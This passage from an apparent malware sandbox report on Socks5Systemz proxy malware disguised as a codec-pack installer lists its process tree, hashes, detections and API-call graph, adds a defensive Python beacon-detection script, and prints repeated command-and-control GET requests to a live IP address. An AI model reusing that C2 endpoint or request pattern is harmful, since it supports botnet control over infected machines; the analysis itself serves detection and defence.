2024-12-18 20:10:03 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:10:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:10:03 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 26
Source IP: 192.168.2.8
Source Port: 49838
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:10:05 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:10:05 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:10:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:10:05 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 27
Source IP: 192.168.2.8
Source Port: 49845
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:10:07 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:10:08 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:10:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:10:08 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250
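The sessions above are seven copies of the same GET to 188.119.66.185, sent by mediacodecpack.exe every two to three seconds, as cleartext HTTP to port 443, with a User-Agent that names a Windows NT version that does not exist (9.0). Every response is the same chunked body: the "Data Raw" bytes decode to a 14-byte payload, 8b723663ec1325; the "Data Ascii" view shows e8b723663ec13250 only because the chunk-size line (e), the CRLFs and the terminating zero chunk have been run together. The Python below is an added example, not part of the Joe Sandbox report: it decodes that chunked body and scores the session list for beacon-like behaviour. The session records are transcribed from this section; the thresholds (MIN_REQUESTS, MAX_JITTER) and the set of real Windows NT version strings are assumptions made for the example.

```python
"""Checks over the mediacodecpack.exe HTTP sessions listed above.

Added example, not part of the Joe Sandbox report.  SESSIONS is transcribed
from the report; MIN_REQUESTS, MAX_JITTER and KNOWN_NT_VERSIONS are assumptions
chosen for this example.
"""
import re
from datetime import datetime, timezone
from statistics import mean, pstdev

# Transcribed from the report (constructed input, not a packet capture).
REQUEST_LINE = "GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1"
USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
# "Data Raw" of every response: a chunked body with a single 0xe-byte chunk.
RESPONSE_RAW_HEX = "65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a"

# One outbound request per session; the first session's header is not visible
# on this page, so its id is recorded as None.
_TIMES = [(None, "2024-12-18 20:09:53"), (22, "2024-12-18 20:09:55"),
          (23, "2024-12-18 20:09:57"), (24, "2024-12-18 20:10:00"),
          (25, "2024-12-18 20:10:02"), (26, "2024-12-18 20:10:05"),
          (27, "2024-12-18 20:10:07")]
SESSIONS = [
    {"id": sid, "ts": ts, "dst_ip": "188.119.66.185", "dst_port": 443,
     "request_line": REQUEST_LINE, "user_agent": USER_AGENT,
     "response_raw_hex": RESPONSE_RAW_HEX}
    for sid, ts in _TIMES
]

# Assumed: NT versions that genuine Windows clients report in a User-Agent.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
MIN_REQUESTS = 5   # assumed: fewer identical requests is not yet a beacon
MAX_JITTER = 0.5   # assumed: max stdev/mean of inter-request gaps


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-encoded body into its payload."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        # chunk-size is hex; anything after ';' is a chunk extension
        size = int(raw[pos:end].split(b";")[0].decode("ascii"), 16)
        pos = end + 2
        if size == 0:          # last-chunk; trailers (if any) are ignored
            break
        out += raw[pos:pos + size]
        pos += size + 2        # chunk data plus its trailing CRLF
    return bytes(out)


def flag_session(s: dict) -> list:
    """Per-request anomalies visible without decrypting anything."""
    flags = []
    # A readable request line on port 443 means the connection is not TLS.
    if s["dst_port"] == 443 and re.match(r"^(GET|POST) \S+ HTTP/1\.[01]$",
                                         s["request_line"]):
        flags.append("cleartext-http-on-443")
    m = re.search(r"Windows NT (\d+\.\d+)", s["user_agent"])
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        flags.append("bogus-windows-nt-version")
    return flags


def _parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def beacon_indicators(sessions: list) -> dict:
    """Aggregate indicators over all requests in the list."""
    times = sorted(_parse_ts(s["ts"]) for s in sessions)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean_gap = mean(gaps) if gaps else 0.0
    jitter = (pstdev(gaps) / mean_gap) if mean_gap else 0.0
    indicators = []
    if (len(sessions) >= MIN_REQUESTS
            and len({s["request_line"] for s in sessions}) == 1):
        indicators.append("identical-request-line")
    if len(gaps) >= MIN_REQUESTS - 1 and jitter <= MAX_JITTER:
        indicators.append("regular-interval")
    return {"request_count": len(sessions), "mean_interval_s": mean_gap,
            "jitter": jitter, "indicators": indicators}


if __name__ == "__main__":
    print("response payload:", decode_chunked(bytes.fromhex(RESPONSE_RAW_HEX)))
    print("per-request flags:", flag_session(SESSIONS[0]))
    print("beacon summary:", beacon_indicators(SESSIONS))
```

On this input the seven requests have a mean gap of about 2.3 s with a jitter of about 0.2, so both beacon indicators fire; the per-request checks fire on every session because the request line and User-Agent never change. The same two functions can be fed a proxy log or a Zeek http.log once the fields are mapped to the same keys.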



                                                                                          Target ID:0
                                                                                          Start time:15:08:02
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\Desktop\Hbq580QZAR.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Hbq580QZAR.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:3'445'716 bytes
                                                                                          MD5 hash:015BCE2662BF644E819A99D3D2B0548B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:1
                                                                                          Start time:15:08:02
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:706'560 bytes
                                                                                          MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 3%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:15:08:03
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                                          Imagebase:0x400000
                                                                                          File size:3'306'150 bytes
                                                                                          MD5 hash:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:false


                                                                                            Execution Graph

                                                                                            Execution Coverage:21.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:1520
                                                                                            Total number of Limit Nodes:22
execution_graph: node-and-edge listing of the execution graph (1520 nodes), rendered interactively in the report and dumped here as flat text; the listing is truncated at the end of the page. Windows API calls that appear as graph nodes include: CloseHandle, RaiseException, WriteFile, ReadFile, SetFilePointer, InterlockedExchange, RtlUnwind, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess, DestroyWindow, RemoveDirectoryA, CreateDirectoryA, MessageBoxA, CallWindowProcA, IsDBCSLeadByte, CharPrevA, VirtualFree, LocalFree, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, GetSystemTime, GetLastError, SetLastError, SetErrorMode, Wow64RevertWow64FsRedirection, GetUserDefaultLangID, GetACP, GetModuleHandleA, GetProcAddress, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetWindowsDirectoryA, GetEnvironmentVariableA, GetFullPathNameA, GetFileAttributesA.
6180->6182 6182->6179 6191 406680 IsDBCSLeadByte 6182->6191 6183->6170 6185 403486 6184->6185 6186 403459 6184->6186 6187 403198 4 API calls 6185->6187 6186->6185 6189 40346d 6186->6189 6188 40347c 6187->6188 6188->6175 6190 403278 18 API calls 6189->6190 6190->6188 6192 406694 6191->6192 6192->6182 6194 403198 4 API calls 6193->6194 6196 4091d1 6194->6196 6198 4091fe 6196->6198 6210 4032a8 6196->6210 6213 403494 6196->6213 6199 403198 4 API calls 6198->6199 6200 409213 6199->6200 6200->6125 6202 408f70 2 API calls 6201->6202 6203 40904a 6202->6203 6204 40904e 6203->6204 6217 406a48 6203->6217 6204->6125 6207 409081 6208 408fac Wow64RevertWow64FsRedirection 6207->6208 6209 409089 6208->6209 6209->6125 6211 403278 18 API calls 6210->6211 6212 4032b5 6211->6212 6212->6196 6214 403498 6213->6214 6216 4034c3 6213->6216 6215 4034f0 18 API calls 6214->6215 6215->6216 6216->6196 6218 4069dc 21 API calls 6217->6218 6219 406a52 GetLastError 6218->6219 6219->6207 6221 406744 IsDBCSLeadByte 6220->6221 6223 406835 6221->6223 6222 40687f 6222->5989 6223->6222 6224 406680 IsDBCSLeadByte 6223->6224 6224->6223 6226 4068f3 6225->6226 6227 406820 IsDBCSLeadByte 6226->6227 6229 4068fe 6227->6229 6228 4066ea 6228->5994 6228->5995 6229->6228 6230 406680 IsDBCSLeadByte 6229->6230 6230->6229 6232 406957 6231->6232 6233 40695b 6231->6233 6232->6008 6236 406970 CharPrevA 6233->6236 6235 40696c 6235->6008 6236->6235 6811 408f30 6814 408dfc 6811->6814 6815 408e05 6814->6815 6816 403198 4 API calls 6815->6816 6817 408e13 6815->6817 6816->6815 6818 403932 6819 403924 6818->6819 6820 40374c VariantClear 6819->6820 6821 40392c 6820->6821 5381 4075c4 SetFilePointer 5382 4075f7 5381->5382 5383 4075e7 GetLastError 5381->5383 5383->5382 5384 4075f0 5383->5384 5386 40748c GetLastError 5384->5386 5389 4073ec 5386->5389 5390 407284 19 API calls 5389->5390 5391 407414 5390->5391 5392 407434 5391->5392 5393 405194 33 API calls 5391->5393 5394 405890 18 API calls 5392->5394 5393->5392 5395 407443 
5394->5395 5396 403198 4 API calls 5395->5396 5397 407460 5396->5397 5397->5382 6412 4076c8 WriteFile 6413 4076e8 6412->6413 6414 4076ef 6412->6414 6415 40748c 35 API calls 6413->6415 6416 407700 6414->6416 6417 4073ec 34 API calls 6414->6417 6415->6414 6417->6416 6418 402ccc 6421 402cfe 6418->6421 6422 402cdd 6418->6422 6419 402d88 RtlUnwind 6420 403154 4 API calls 6419->6420 6420->6421 6422->6419 6422->6421 6423 402b28 RaiseException 6422->6423 6424 402d7f 6423->6424 6424->6419 6830 403fcd 6831 403f07 4 API calls 6830->6831 6832 403fd6 6831->6832 6833 403e9c 4 API calls 6832->6833 6834 403fe2 6833->6834 6431 4024d0 6432 4024e4 6431->6432 6433 4024e9 6431->6433 6436 401918 4 API calls 6432->6436 6434 402518 6433->6434 6435 40250e RtlEnterCriticalSection 6433->6435 6438 4024ed 6433->6438 6446 402300 6434->6446 6435->6434 6436->6433 6439 402525 6442 402581 6439->6442 6443 402577 RtlLeaveCriticalSection 6439->6443 6441 401fd4 14 API calls 6444 402531 6441->6444 6443->6442 6444->6439 6445 40215c 9 API calls 6444->6445 6445->6439 6447 402314 6446->6447 6449 402335 6447->6449 6450 4023b8 6447->6450 6448 402344 6448->6439 6448->6441 6449->6448 6452 401b74 9 API calls 6449->6452 6450->6448 6451 401d80 9 API calls 6450->6451 6454 402455 6450->6454 6456 401e84 6450->6456 6451->6450 6452->6448 6454->6448 6455 401d00 9 API calls 6454->6455 6455->6448 6461 401768 6456->6461 6458 401e99 6459 401ea6 6458->6459 6460 401dcc 9 API calls 6458->6460 6459->6450 6460->6459 6462 401787 6461->6462 6463 40183b 6462->6463 6464 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6462->6464 6466 40132c LocalAlloc 6462->6466 6467 401821 6462->6467 6469 4017d6 6462->6469 6465 4015c4 VirtualAlloc 6463->6465 6470 4017e7 6463->6470 6464->6462 6465->6470 6466->6462 6468 40150c VirtualFree 6467->6468 6468->6470 6471 40150c VirtualFree 6469->6471 6470->6458 6471->6470 6472 4028d2 6473 4028da 6472->6473 6474 403554 4 API calls 6473->6474 6475 4028ef 6473->6475 6474->6473 6476 4025ac 4 API calls 
6475->6476 6477 4028f4 6476->6477 6835 4019d3 6836 4019ba 6835->6836 6837 4019c3 RtlLeaveCriticalSection 6836->6837 6838 4019cd 6836->6838 6837->6838 5398 407fd4 5399 407fe6 5398->5399 5401 407fed 5398->5401 5409 407f10 5399->5409 5403 408017 5401->5403 5405 408015 5401->5405 5407 408021 5401->5407 5402 40804e 5420 407d7c 5403->5420 5404 407d7c 33 API calls 5404->5402 5423 407e2c 5405->5423 5407->5402 5407->5404 5410 407f25 5409->5410 5411 407d7c 33 API calls 5410->5411 5412 407f34 5410->5412 5411->5412 5413 407f6e 5412->5413 5414 407d7c 33 API calls 5412->5414 5415 407f82 5413->5415 5416 407d7c 33 API calls 5413->5416 5414->5413 5419 407fae 5415->5419 5430 407eb8 5415->5430 5416->5415 5419->5401 5433 4058c4 5420->5433 5422 407d9e 5422->5407 5424 405194 33 API calls 5423->5424 5425 407e57 5424->5425 5441 407de4 5425->5441 5427 407e5f 5428 403198 4 API calls 5427->5428 5429 407e74 5428->5429 5429->5407 5431 407ec7 VirtualFree 5430->5431 5432 407ed9 VirtualAlloc 5430->5432 5431->5432 5432->5419 5435 4058d0 5433->5435 5434 405194 33 API calls 5436 4058fd 5434->5436 5435->5434 5437 4031e8 18 API calls 5436->5437 5438 405908 5437->5438 5439 403198 4 API calls 5438->5439 5440 40591d 5439->5440 5440->5422 5442 4058c4 33 API calls 5441->5442 5443 407e06 5442->5443 5443->5427 6478 405ad4 6479 405adc 6478->6479 6480 405ae4 6478->6480 6481 405ae2 6479->6481 6482 405aeb 6479->6482 6485 405a4c 6481->6485 6483 405940 19 API calls 6482->6483 6483->6480 6486 405a54 6485->6486 6487 405a6e 6486->6487 6490 403154 4 API calls 6486->6490 6488 405a73 6487->6488 6489 405a8a 6487->6489 6491 405940 19 API calls 6488->6491 6492 403154 4 API calls 6489->6492 6490->6486 6493 405a86 6491->6493 6494 405a8f 6492->6494 6496 403154 4 API calls 6493->6496 6495 4059b0 33 API calls 6494->6495 6495->6493 6497 405ab8 6496->6497 6498 403154 4 API calls 6497->6498 6499 405ac6 6498->6499 6499->6480 5911 40a9de 5912 40aa03 5911->5912 5913 407918 InterlockedExchange 5912->5913 5914 40aa2d 5913->5914 5915 
409ae8 18 API calls 5914->5915 5916 40aa3d 5914->5916 5915->5916 5921 4076ac SetEndOfFile 5916->5921 5918 40aa59 5919 4025ac 4 API calls 5918->5919 5920 40aa90 5919->5920 5922 4076c3 5921->5922 5923 4076bc 5921->5923 5922->5918 5924 40748c 35 API calls 5923->5924 5924->5922 6842 402be9 RaiseException 6843 402c04 6842->6843 6510 402af2 6511 402afe 6510->6511 6514 402ed0 6511->6514 6515 403154 4 API calls 6514->6515 6517 402ee0 6515->6517 6516 402b03 6517->6516 6519 402b0c 6517->6519 6520 402b25 6519->6520 6521 402b15 RaiseException 6519->6521 6520->6516 6521->6520 5449 40a5f8 5492 4030dc 5449->5492 5451 40a60e 5495 4042e8 5451->5495 5453 40a613 5498 40457c GetModuleHandleA GetProcAddress 5453->5498 5457 40a61d 5506 4065c8 5457->5506 5459 40a622 5515 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5459->5515 5468 40a665 5537 406c2c 5468->5537 5470 4031e8 18 API calls 5471 40a683 5470->5471 5551 4074e0 5471->5551 5477 407918 InterlockedExchange 5479 40a6d2 5477->5479 5478 40a710 5571 4074a0 5478->5571 5479->5478 5608 409ae8 5479->5608 5481 40a751 5575 407a28 5481->5575 5482 40a736 5482->5481 5484 409ae8 18 API calls 5482->5484 5484->5481 5485 40a776 5585 408b08 5485->5585 5489 40a7bc 5490 408b08 35 API calls 5489->5490 5491 40a7f5 5489->5491 5490->5489 5618 403094 5492->5618 5494 4030e1 GetModuleHandleA GetCommandLineA 5494->5451 5496 403154 4 API calls 5495->5496 5497 404323 5495->5497 5496->5497 5497->5453 5499 404598 5498->5499 5500 40459f GetProcAddress 5498->5500 5499->5500 5501 4045b5 GetProcAddress 5500->5501 5502 4045ae 5500->5502 5503 4045c4 SetProcessDEPPolicy 5501->5503 5504 4045c8 5501->5504 5502->5501 5503->5504 5505 404624 6FAA1CD0 5504->5505 5505->5457 5619 405ca8 5506->5619 5516 4090f7 5515->5516 5703 406fa0 SetErrorMode 5516->5703 5519 407284 19 API calls 5520 409127 5519->5520 5521 403198 4 API calls 5520->5521 5522 40913c 5521->5522 5523 409b78 GetSystemInfo VirtualQuery 5522->5523 5524 409c2c 5523->5524 5527 409ba2 5523->5527 
5529 409768 5524->5529 5525 409c0d VirtualQuery 5525->5524 5525->5527 5526 409bcc VirtualProtect 5526->5527 5527->5524 5527->5525 5527->5526 5528 409bfb VirtualProtect 5527->5528 5528->5525 5709 406bd0 GetCommandLineA 5529->5709 5531 409850 5533 4031b8 4 API calls 5531->5533 5532 406c2c 20 API calls 5536 409785 5532->5536 5534 40986a 5533->5534 5534->5468 5601 409c88 5534->5601 5535 403454 18 API calls 5535->5536 5536->5531 5536->5532 5536->5535 5538 406c53 GetModuleFileNameA 5537->5538 5539 406c77 GetCommandLineA 5537->5539 5540 403278 18 API calls 5538->5540 5547 406c7c 5539->5547 5541 406c75 5540->5541 5545 406ca4 5541->5545 5542 406c81 5543 403198 4 API calls 5542->5543 5546 406c89 5543->5546 5544 406af0 18 API calls 5544->5547 5548 403198 4 API calls 5545->5548 5549 40322c 4 API calls 5546->5549 5547->5542 5547->5544 5547->5546 5550 406cb9 5548->5550 5549->5545 5550->5470 5552 4074ea 5551->5552 5716 407576 5552->5716 5719 407578 5552->5719 5553 407516 5554 40752a 5553->5554 5555 40748c 35 API calls 5553->5555 5558 409c34 FindResourceA 5554->5558 5555->5554 5559 409c49 5558->5559 5560 409c4e SizeofResource 5558->5560 5561 409ae8 18 API calls 5559->5561 5562 409c60 LoadResource 5560->5562 5563 409c5b 5560->5563 5561->5560 5565 409c73 LockResource 5562->5565 5566 409c6e 5562->5566 5564 409ae8 18 API calls 5563->5564 5564->5562 5568 409c84 5565->5568 5569 409c7f 5565->5569 5567 409ae8 18 API calls 5566->5567 5567->5565 5568->5477 5568->5479 5570 409ae8 18 API calls 5569->5570 5570->5568 5572 4074b4 5571->5572 5573 4074c4 5572->5573 5574 4073ec 34 API calls 5572->5574 5573->5482 5574->5573 5576 407a35 5575->5576 5577 405890 18 API calls 5576->5577 5578 407a89 5576->5578 5577->5578 5579 407918 InterlockedExchange 5578->5579 5580 407a9b 5579->5580 5581 405890 18 API calls 5580->5581 5582 407ab1 5580->5582 5581->5582 5583 405890 18 API calls 5582->5583 5584 407af4 5582->5584 5583->5584 5584->5485 5590 408b82 5585->5590 5597 408b39 5585->5597 5586 408bcd 5722 407cb8 
5586->5722 5587 407cb8 35 API calls 5587->5597 5589 408be4 5593 4031b8 4 API calls 5589->5593 5590->5586 5592 4034f0 18 API calls 5590->5592 5598 4031e8 18 API calls 5590->5598 5599 403420 18 API calls 5590->5599 5600 407cb8 35 API calls 5590->5600 5591 4034f0 18 API calls 5591->5597 5592->5590 5596 408bfe 5593->5596 5594 403420 18 API calls 5594->5597 5595 4031e8 18 API calls 5595->5597 5615 404c20 5596->5615 5597->5587 5597->5590 5597->5591 5597->5594 5597->5595 5598->5590 5599->5590 5600->5590 5602 40322c 4 API calls 5601->5602 5603 409cab 5602->5603 5604 409cba MessageBoxA 5603->5604 5605 409ccf 5604->5605 5606 403198 4 API calls 5605->5606 5607 409cd7 5606->5607 5607->5468 5609 409af1 5608->5609 5610 409b09 5608->5610 5611 405890 18 API calls 5609->5611 5612 405890 18 API calls 5610->5612 5613 409b03 5611->5613 5614 409b1a 5612->5614 5613->5478 5614->5478 5744 402594 5615->5744 5617 404c2b 5617->5489 5618->5494 5620 405940 19 API calls 5619->5620 5621 405cb9 5620->5621 5622 405280 GetSystemDefaultLCID 5621->5622 5626 4052b6 5622->5626 5623 40520c 19 API calls 5623->5626 5624 4031e8 18 API calls 5624->5626 5625 404cdc 19 API calls 5625->5626 5626->5623 5626->5624 5626->5625 5627 405318 5626->5627 5628 4031e8 18 API calls 5627->5628 5629 404cdc 19 API calls 5627->5629 5630 40520c 19 API calls 5627->5630 5631 40539b 5627->5631 5628->5627 5629->5627 5630->5627 5632 4031b8 4 API calls 5631->5632 5633 4053b5 5632->5633 5634 4053c4 GetSystemDefaultLCID 5633->5634 5691 40520c GetLocaleInfoA 5634->5691 5637 4031e8 18 API calls 5638 405404 5637->5638 5639 40520c 19 API calls 5638->5639 5640 405419 5639->5640 5641 40520c 19 API calls 5640->5641 5642 40543d 5641->5642 5697 405258 GetLocaleInfoA 5642->5697 5645 405258 GetLocaleInfoA 5646 40546d 5645->5646 5647 40520c 19 API calls 5646->5647 5648 405487 5647->5648 5649 405258 GetLocaleInfoA 5648->5649 5650 4054a4 5649->5650 5651 40520c 19 API calls 5650->5651 5652 4054be 5651->5652 5653 4031e8 18 API calls 5652->5653 5654 
4054cb 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054e0 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 4054ed 5657->5658 5659 405258 GetLocaleInfoA 5658->5659 5660 4054fb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 405515 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 405522 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405537 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405544 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405559 5669->5670 5671 405576 5670->5671 5672 405567 5670->5672 5674 40322c 4 API calls 5671->5674 5699 40322c 5672->5699 5675 405574 5674->5675 5676 40520c 19 API calls 5675->5676 5677 405598 5676->5677 5678 4055b5 5677->5678 5679 4055a6 5677->5679 5681 403198 4 API calls 5678->5681 5680 40322c 4 API calls 5679->5680 5682 4055b3 5680->5682 5681->5682 5683 4033b4 18 API calls 5682->5683 5684 4055d7 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055f1 5685->5686 5687 4031b8 4 API calls 5686->5687 5688 40560b 5687->5688 5689 405cf4 GetVersionExA 5688->5689 5690 405d0b 5689->5690 5690->5459 5692 405233 5691->5692 5693 405245 5691->5693 5694 403278 18 API calls 5692->5694 5695 40322c 4 API calls 5693->5695 5696 405243 5694->5696 5695->5696 5696->5637 5698 405274 5697->5698 5698->5645 5701 403230 5699->5701 5700 403252 5700->5675 5701->5700 5702 4025ac 4 API calls 5701->5702 5702->5700 5707 403414 5703->5707 5706 406fee 5706->5519 5708 403418 LoadLibraryA 5707->5708 5708->5706 5710 406af0 18 API calls 5709->5710 5711 406bf3 5710->5711 5712 406c05 5711->5712 5713 406af0 18 API calls 5711->5713 5714 403198 4 API calls 5712->5714 5713->5711 5715 406c1a 5714->5715 5715->5536 5717 407578 5716->5717 5718 4075b7 CreateFileA 5717->5718 5718->5553 5720 403414 5719->5720 5721 4075b7 CreateFileA 5720->5721 5721->5553 5723 407cd3 5722->5723 5725 407cc8 5722->5725 5728 407c5c 5723->5728 5725->5589 5727 405890 18 API calls 5727->5725 5729 407c70 5728->5729 5730 407caf 5728->5730 5729->5730 5732 407bac 5729->5732 
5730->5725 5730->5727 5733 407bb7 5732->5733 5734 407bc8 5732->5734 5736 405890 18 API calls 5733->5736 5735 4074a0 34 API calls 5734->5735 5737 407bdc 5735->5737 5736->5734 5738 4074a0 34 API calls 5737->5738 5739 407bfd 5738->5739 5740 407918 InterlockedExchange 5739->5740 5741 407c12 5740->5741 5742 407c28 5741->5742 5743 405890 18 API calls 5741->5743 5742->5729 5743->5742 5745 402598 5744->5745 5747 4025a2 5744->5747 5750 401fd4 5745->5750 5746 40259e 5746->5747 5748 403154 4 API calls 5746->5748 5747->5617 5747->5747 5748->5747 5751 401fe8 5750->5751 5752 401fed 5750->5752 5761 401918 RtlInitializeCriticalSection 5751->5761 5754 402012 RtlEnterCriticalSection 5752->5754 5755 40201c 5752->5755 5758 401ff1 5752->5758 5754->5755 5755->5758 5768 401ee0 5755->5768 5758->5746 5759 402147 5759->5746 5760 40213d RtlLeaveCriticalSection 5760->5759 5762 40193c RtlEnterCriticalSection 5761->5762 5763 401946 5761->5763 5762->5763 5764 401964 LocalAlloc 5763->5764 5765 40197e 5764->5765 5766 4019c3 RtlLeaveCriticalSection 5765->5766 5767 4019cd 5765->5767 5766->5767 5767->5752 5771 401ef0 5768->5771 5769 401f1c 5773 401f40 5769->5773 5779 401d00 5769->5779 5771->5769 5771->5773 5774 401e58 5771->5774 5773->5759 5773->5760 5783 4016d8 5774->5783 5777 401e75 5777->5771 5780 401d4e 5779->5780 5781 401d1e 5779->5781 5780->5781 5852 401c68 5780->5852 5781->5773 5786 4016f4 5783->5786 5785 4016fe 5808 4015c4 5785->5808 5786->5785 5788 40175b 5786->5788 5790 40174f 5786->5790 5800 401430 5786->5800 5812 40132c 5786->5812 5788->5777 5793 401dcc 5788->5793 5816 40150c 5790->5816 5791 40170a 5791->5788 5826 401d80 5793->5826 5796 40132c LocalAlloc 5797 401df0 5796->5797 5799 401df8 5797->5799 5830 401b44 5797->5830 5799->5777 5801 40143f VirtualAlloc 5800->5801 5803 40146c 5801->5803 5804 40148f 5801->5804 5820 4012e4 5803->5820 5804->5786 5807 40147c VirtualFree 5807->5804 5810 40160a 5808->5810 5809 40163a 5809->5791 5810->5809 5811 401626 VirtualAlloc 5810->5811 5811->5809 
